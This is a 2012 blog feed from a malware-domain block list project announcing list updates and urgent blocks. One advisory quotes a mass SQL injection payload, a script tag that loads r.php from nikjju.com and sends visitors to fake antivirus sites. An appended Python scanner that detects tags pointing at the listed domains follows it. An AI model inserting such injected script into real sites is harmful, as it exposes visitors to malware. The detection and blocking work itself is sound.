
Site Delisting: kollshi.com

Posted on April 30th, 2012 in Removed Domains by dglosser

kollshi.com has been delisted and will be removed on the next update

malvertising, malicious js, bugat domains

Posted on April 29th, 2012 in New Domains by dglosser

Added 137 domains associated with google safebrowsing, malvertising, malicious javascript, etc. Sources include exposure.iseclab.org, safebrowsing.clients.google.com, stopmalvertising.com and others (all sources are listed in our domain.txt file.)

Compressed files are located at: http://www.malware-domains.com (full zone files, note the dash)  and http://dns-bh.sagadc.org/.  We also have a mirror dedicated to research and Open Source Projects – contact us for details.

* Please help to keep this site free and donate whatever you can:  All donations go to hosting and infrastructure costs.
* The malware block lists provided here are free for noncommercial use as part of the fight against malware. Any commercial use of this list is strictly prohibited without prior approval.
* Please use the “datestamp” and “timestamp” file to determine if the list has been updated and ONLY pull the files you need – abusers will be banned! Use “wget -N”!
* Yearly sponsorships are available. Full acknowledgment, an icon, and link back to your site will be placed in the left sidebar.
* The Domains.txt file is the complete list along with the original reference. Justdomains contains only the domain names. The BOOT file is in MS DNS format. The Malwaredomains.zones file is in BIND format. Also available in AdBlock, ISA, and MaraDNS formats. A trusted source on WOT, the Web of Trust. Used by SURBL, MOREnet, SANS, and others…

sqli: Block Njukol -dot – com

Posted on April 29th, 2012 in 0day,iframes,New Domains,sql injection by dglosser

We received a report that there’s a SQL injection going on with njukol . com/ r.php. Please check your web sites and add this to your block or shun list. Original Source: http://ilion.blog47.fc2.com/

Check your download scripts ASAP

Posted on April 29th, 2012 in Domain News,mirror by dglosser

Check your download scripts ASAP….

Too many users are STILL pointing to the main www site for the zone files, which have not been here for MONTHS…

PLEASE update your scripts to pull from one of the download mirrors. DO NOT point to the www (blog) site as there is nothing to download.

Small Update – 4/27

Posted on April 28th, 2012 in malvertising,New Domains,Trojans,zeus by dglosser

Had server issues on the blog site, so this is a few days late. Added a couple of dozen malvertising, zeus, palevo and other harmful domains on 4/27.

Too many users are STILL pointing to the main (blog) site for the zone files and are causing server issues…

PLEASE update your scripts to pull from one of the download mirrors or your site will be BANNED.

Adblock Plus Issue

Posted on April 24th, 2012 in New Domains by dglosser

We realize there are problems with the Adblock Plus subscriptions. The issue is being looked at and should be resolved soon.

Fake-AV, exploit, malvertising domains

Posted on April 21st, 2012 in malvertising,New Domains,rogue antivirus,Trojans,zlob by dglosser

Added 124 domains associated with rogue/fake AV, malvertising, exploits, etc. Sources include hosts-file.net, www.emergingthreats.net, www.urlvoid.com (all sources are listed in our domain.txt file.)


The Suspicious Domains List at SANS

Posted on April 18th, 2012 in Domain News by dglosser

After some maintenance downtime, the Suspicious Domains lists at https://isc.sans.edu/tools/suspicious_domains.html have been re-launched. This project was developed by handler Jason Lam and is an effort to assemble weighted lists of suspicious domains based on tracking, malware and other sources.

hostexploit.com top bad hosts – 2012 Q1

Posted on April 18th, 2012 in iframes,malvertising,New Domains,sql injection,Trojans by dglosser

We added our friends nikjju . com and best-antiviruu.de .lv and also listed domains from ISPs or hosting services listed on hostexploit.com‘s Q1 report on the top bad hosts. To round things out, we also added domains flagged by sucuri as having malicious javascript or iframes.


Urgent Block: nikjju.com and best-antiviruu.de.lv

Posted on April 17th, 2012 in 0day,iframes,rogue antivirus,sql injection by dglosser

Sucuri is reporting a new Mass SQL Injection campaign. Sites are infected with the following javascript:

<script src= http://nikjju . com/r.php ></script>

which redirects to Fake/Rogue AV sites such as best-antiviruu. de. lv

Please add these sites to your blocklists and sinkholes ASAP.
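For site owners checking their own pages for this injection, the following is an added example (not part of the original post and not a malwaredomains tool) that parses HTML and reports script or iframe tags whose src resolves to one of the domains named in these posts. The function names, the sample page and the inclusion of iframe tags are assumptions made for the illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Domains named in the posts above, written without the defanging spaces.
BLOCKED = {"nikjju.com", "njukol.com", "best-antiviruu.de.lv"}

def is_blocked(host, blocked=BLOCKED):
    """True if host is a blocked domain or any subdomain of one."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in blocked)

class InjectedSrcFinder(HTMLParser):
    """Collects script/iframe tags whose src points at a blocked domain."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe"):  # iframe coverage is an assumption
            return
        for name, value in attrs:
            if name != "src" or not value:
                continue
            url = value.strip()
            try:
                # urlsplit also resolves protocol-relative //host/path values
                host = urlsplit(url).hostname
            except ValueError:  # malformed URL, e.g. a broken IPv6 literal
                continue
            if is_blocked(host):
                self.hits.append((self.getpos()[0], tag, url))

def scan_html(text):
    """Return (line, tag, url) for every blocked src found in text."""
    finder = InjectedSrcFinder()
    finder.feed(text)
    finder.close()
    return finder.hits

# Constructed sample page: the unquoted tag mirrors the one quoted in the post.
SAMPLE = """<html><body>
<h1>Spring catalogue</h1>
<p>Garden chairs<script src=http://nikjju.com/r.php></script></p>
<script src="/static/site.js"></script>
<script src="//cdn.example.org/lib.js"></script>
<iframe src="http://www.njukol.com/r.php"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for line, tag, url in scan_html(SAMPLE):
        print(f"line {line}: <{tag}> loads {url}")
```

Because the campaign writes the tag into database fields, run the same check over rendered pages and over exported text columns, not only over template files.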